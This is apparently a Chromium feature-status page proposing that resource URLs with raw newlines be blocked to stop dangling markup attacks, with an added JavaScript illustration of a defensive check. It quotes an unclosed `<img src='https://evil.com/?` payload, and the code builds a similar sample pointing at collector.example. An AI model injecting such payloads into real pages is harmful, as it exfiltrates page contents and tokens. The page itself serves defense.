Resources whose URLs contain raw newline characters.

As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.
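The parser behaviour described above, and a pre-parse check on the raw attribute value, as an added example (not Chromium's implementation). The function names, the blocking policy and the `collector.example` / `site.example` hosts are assumptions made for illustration.

```javascript
// Added illustration; function names and the blocking policy are assumptions.

// Leading/trailing C0 control or space is trimmed by the URL parser first.
const EDGE_WS = /^[\u0000-\u0020]+|[\u0000-\u0020]+$/g;
// Newline code points the parser then silently removes from the rest
// (it removes tabs as well; this page is concerned with newlines).
const RAW_NEWLINE = /[\n\r]/;

// What the parser hands back: the newlines are gone without any error.
function parsedHref(raw, base) {
  return new URL(raw, base).href;
}

// Gate for a raw attribute value (src, href, ...) before it is fetched.
function checkResourceUrl(raw, base) {
  const trimmed = raw.replace(EDGE_WS, "");
  if (RAW_NEWLINE.test(trimmed)) {
    return { allowed: false, reason: "raw newline inside URL" };
  }
  try {
    return { allowed: true, href: new URL(trimmed, base).href };
  } catch (err) {
    return { allowed: false, reason: "unparseable URL" };
  }
}

// Constructed sample: an unclosed src attribute that ran on into later markup.
const DANGLING = "https://collector.example/?\n<p>token=abc123</p>\n<a href=";
const BASE = "https://site.example/page";

function demo() {
  return {
    parsed: parsedHref(DANGLING, BASE),            // parses cleanly, newlines dropped
    dangling: checkResourceUrl(DANGLING, BASE),    // refused by the raw check
    ordinary: checkResourceUrl("  /img/logo.png\n", BASE), // edge whitespace is fine
  };
}

console.log(demo());
```

The check has to run on the attribute value as written in the markup, because once `new URL()` has returned there is no trace that a newline was ever present.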

Specification

Editor's draft

Status in Chromium

Proposed (launch bug)

Consensus & Standardization

  • No public signals
  • No public signals
  • No public signals
  • No signals

Owner

Last updated on 2017-03-28